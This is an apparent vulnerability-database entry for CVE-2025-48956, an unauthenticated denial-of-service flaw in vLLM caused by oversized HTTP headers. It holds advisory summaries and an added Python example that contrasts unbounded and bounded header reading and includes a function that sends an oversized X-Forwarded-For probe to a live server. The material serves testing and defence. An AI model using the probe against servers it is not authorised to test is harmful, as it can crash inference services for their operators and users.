CVE-2025-48956
Published 2025-08-21
Priority: P3
Severity: High (CVSS 3.1 base score 7.5)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS: 0.53% (40.6th percentile)
vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.10.1.1, a Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user. This vulnerability is fixed in 0.10.1.1.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vllm-project | vllm | — | — |
| vllm | vllm | >= 0.1.0, < 0.10.1.1 | 0.10.1.1 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| Red Hat | — | 7.5 | HIGH | — |
OSV
vllm API endpoints vulnerable to Denial of Service Attacks
osv · 2025-08-21 · CVE-2025-48956 [HIGH]
### Summary
A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user.
### Details
The attack abuses HTTP header handling. With a header such as `X-Forwarded-For` set to a very large value (for example `"A" * 5_800_000_000`, about 5.8 GB), the server's HTTP parser or application logic may buffer the entire header block in memory before the request is ever rejected, exhausting system resources with a single request.
### Impact
Type of vulnerability: Denial of Service (
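The following is an added example, not vLLM's own code, illustrating the mechanism the Details section describes: `read_headers()` reads a request's header block either with no cap (the vulnerable pattern, `limit=None`) or with a byte budget after which reading stops, and `build_probe_request()` constructs the oversized GET a tester would send to check a deployment. The header sizes used here are kilobytes rather than the 5.8 GB in the advisory; the behaviour is the same, only the memory cost differs. The host name, path, 16 KiB budget and chunk size are assumptions chosen for the demo.

```python
"""
Added example for CVE-2025-48956; this is not vLLM's code.

read_headers() shows the unbounded pattern (limit=None) next to the bounded
one, and build_probe_request() constructs the oversized GET from the advisory,
scaled down. Host name, path and the 16 KiB budget are assumptions.
"""
import io
import socket

MAX_HEADER_BYTES = 16 * 1024  # assumed budget for the demo


class HeadersTooLarge(Exception):
    """Header block exceeded the budget; an HTTP server would answer 431."""


def read_headers(stream, limit=MAX_HEADER_BYTES, chunk_size=4096):
    """Read the request line and headers (up to and including CRLFCRLF).

    limit=None reproduces the vulnerable pattern: the buffer grows with
    whatever the client sends. With a limit, reading stops once the still
    incomplete header block exceeds the budget, so peak memory is bounded
    by limit + chunk_size regardless of what the client sends.
    """
    buf = bytearray()
    while True:
        end = buf.find(b"\r\n\r\n")
        if end != -1:
            return bytes(buf[:end + 4])
        if limit is not None and len(buf) > limit:
            raise HeadersTooLarge(f"{len(buf)} bytes buffered, limit {limit}")
        chunk = stream.read(chunk_size)
        if not chunk:
            raise ValueError("connection closed before end of headers")
        buf += chunk


def parse_headers(block):
    """Split a header block into (request_line, {lowercased-name: value})."""
    lines = block.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def build_probe_request(header_size, host="vllm.example.internal", path="/health"):
    """Constructed probe: a GET whose X-Forwarded-For is header_size bytes of 'A'."""
    return (b"GET " + path.encode() + b" HTTP/1.1\r\n"
            + b"Host: " + host.encode() + b"\r\n"
            + b"X-Forwarded-For: " + b"A" * header_size + b"\r\n"
            + b"Connection: close\r\n\r\n")


def feed(header_size, limit):
    """Run the probe through read_headers() offline; returns 'accepted' or 'rejected'."""
    stream = io.BytesIO(build_probe_request(header_size))
    try:
        block = read_headers(stream, limit=limit)
    except HeadersTooLarge:
        return "rejected"
    _, headers = parse_headers(block)
    assert len(headers["x-forwarded-for"]) == header_size
    return "accepted"


def probe(host, port, header_size, timeout=10.0):
    """Send the probe to a live server and report the first response line.

    A server that enforces a header limit answers 431 or 400 (or drops the
    connection) without reading the whole header; one that does not keeps
    reading. Not run in this demo.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe_request(header_size, host=host))
        first = sock.recv(256)
    return first.split(b"\r\n", 1)[0].decode("latin-1", "replace") or "connection closed"


if __name__ == "__main__":
    for size, limit in [(200, MAX_HEADER_BYTES),
                        (1_000_000, None),
                        (1_000_000, MAX_HEADER_BYTES)]:
        print(f"header={size:>9} bytes  limit={limit}: {feed(size, limit)}")
```

When probing a real server with a very large header, expect `sendall()` to fail with a broken pipe if the server closes the connection early; that early close is the behaviour you want to see. Deployment-side, a reverse proxy with its own header-size cap (for example nginx's `large_client_header_buffers`) is a compensating control for versions before 0.10.1.1; the fixed release exposes header-size limits for the underlying h11 protocol handler (as recalled, `--h11-max-incomplete-event-size` and `--h11-max-header-count`; confirm the exact names against `vllm serve --help` for your version).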
GHSA
vllm API endpoints vulnerable to Denial of Service Attacks
ghsa · 2025-08-21 · CVE-2025-48956 [HIGH] · CWE-400
Red Hat
vllm: HTTP header size limit not enforced allows Denial of Service from Unauthenticated requests
vendor_redhat · 2025-08-26 · CVSS 7.5 · CVE-2025-48956 [HIGH] · CWE-130
A flaw was found in vLLM. A denial of service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large X-Forwarded-For header to an HTTP endpoint. This results in server memory exhaustion,
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
Published: 2025-08-21